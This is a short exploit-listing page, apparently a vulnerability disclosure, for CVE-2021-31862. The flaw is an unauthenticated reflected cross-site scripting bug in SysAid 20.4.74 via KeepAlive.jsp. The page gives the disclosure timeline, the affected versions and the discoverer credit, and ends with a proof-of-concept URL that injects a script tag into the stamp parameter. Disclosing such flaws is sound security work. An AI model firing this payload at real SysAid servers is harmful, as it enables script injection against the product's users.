Exploit for Cross-site Scripting in Sysaid CVE-2021-31862

Name: Exploit for Cross-site Scripting in Sysaid CVE-2021-31862
Rating: 5 (108 reviews)

2021-10-28 | CVSS 4.3

## https://sploitus.com/exploit?id=435C14DC-682E-5B09-9895-0B3D50AF6445
# CVE-2021-31862

SysAid 20.4.74 allows reflected XSS via the KeepAlive.jsp parameter, without authentication.


Timeline

Discovered: April 28, 2021

Initial Vendor Contact: April 28, 2021

Reported: April 28, 2021

CVE ID issued: April 28, 2021

Secondary Vendor Contact: (Vendor did not reply to initial contact): May 28, 2021

Public Release: October 29, 2021

Affected Versions:

20.4.74 and prior

Credit:

Citadel Cyber Security (https://www.citadel.co.il/)


POC Exploit:

The following URL path and query parameters will trigger an XSS vulnerability.

/KeepAlive.jsp?stamp=<script>alert(1)</script>&tabID=10&lastClick=1618311643298


![image](https://user-images.githubusercontent.com/68341018/139206439-dca9e0ba-5213-458b-8811-4e2ced3d8c73.png)